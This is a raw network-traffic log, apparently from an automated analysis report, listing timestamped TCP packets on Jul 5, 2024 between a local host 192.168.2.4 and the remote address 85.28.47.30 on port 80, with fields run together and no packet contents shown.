                                                                Jul 5, 2024 04:35:59.962306023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962475061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962517023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962528944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962532997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962567091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962578058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962593079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962609053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962625027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962634087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962644100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962644100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962668896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962685108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968487978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968518972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968534946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968540907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968549967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968559980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968566895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968581915 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968595982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968605995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968620062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968624115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968641043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968651056 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968657017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968663931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968674898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968687057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968703032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968718052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968728065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968733072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968749046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968765020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.968775034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968797922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968797922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.968805075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969023943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969038963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969057083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969073057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969079018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969090939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969103098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969114065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969120026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969139099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969146013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969172955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969186068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969310999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969326973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969341993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969366074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969378948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969398975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969413996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969429016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969444036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969458103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969465017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969474077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.969476938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969487906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969510078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.969518900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977605104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977644920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977659941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977674007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977677107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977680922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977694988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977704048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977722883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977744102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977807045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977822065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977835894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977854967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977864027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977881908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977883101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977941036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.977952003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977974892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.977998018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978005886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978018045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978066921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978080034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978095055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978135109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978140116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978151083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978184938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978197098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978301048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978326082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978351116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978358984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978367090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978378057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978384018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978389978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978410959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978420973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978532076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978573084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978588104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978590012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978617907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978631020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978657961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978673935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978698015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978708982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978713036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978723049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978728056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978743076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978744030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.978754997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978776932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.978790045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979048967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979063988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979079962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979103088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979120970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979146957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979161978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979176998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979193926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979197025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979221106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979222059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979237080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979247093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979253054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979263067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979266882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979276896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979300022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979310036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979583025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979633093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979634047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979650021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979680061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979691029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979722977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979738951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979753017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979770899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979773998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979794025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979829073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979832888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979857922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979873896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979888916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979888916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979897976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979907036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979916096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979923964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979938984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979940891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.979954004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.979981899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.984153032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.984181881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.984195948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.984215021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.984244108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.984443903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.984512091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053412914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053427935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053453922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053471088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053484917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053494930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053503036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053520918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053530931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053539991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053540945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053556919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053570032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053582907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053591967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053601027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053612947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053612947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053643942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053766966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053782940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053798914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053827047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053850889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053865910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053881884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053895950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053910971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053915024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053922892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053926945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053945065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053952932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053952932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053966045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.053970098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.053986073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054003000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054003954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054012060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054019928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054034948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054048061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054054022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054061890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054064989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054081917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054090023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054097891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054105997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054124117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.054126024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054141998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.054171085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060112953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060127020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060143948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060169935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060173035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060183048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060194016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060214996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060220003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060235023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060235977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060255051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060266972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060270071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060277939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060286999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060296059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060302973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060307026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060327053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060331106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060344934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060348034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060365915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060388088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060388088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060389042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060411930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060431957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060451031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060467005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060487986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060502052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060507059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060508013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060528040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060564995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060590029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060637951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060641050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060666084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060683966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060687065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060705900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060713053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060728073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060740948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060750961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060801983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060808897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060827017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060857058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060868025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.060952902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060970068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.060985088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.061007023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.061021090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.061027050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.069760084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.069787025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.069801092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.069813013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.069824934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.069839954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.069979906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.069998026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070014954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070029974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070041895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070063114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070092916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070130110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070131063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070164919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070180893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070180893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070202112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070221901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070234060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070249081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070264101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070281029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070288897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070295095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070312023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070312977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070329905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070338011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070359945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070384026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070525885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070559978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070583105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070585966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070595980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070604086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070620060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070631981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070636034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070647955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070655107 CEST804973085.28.47.30192.168.2.4
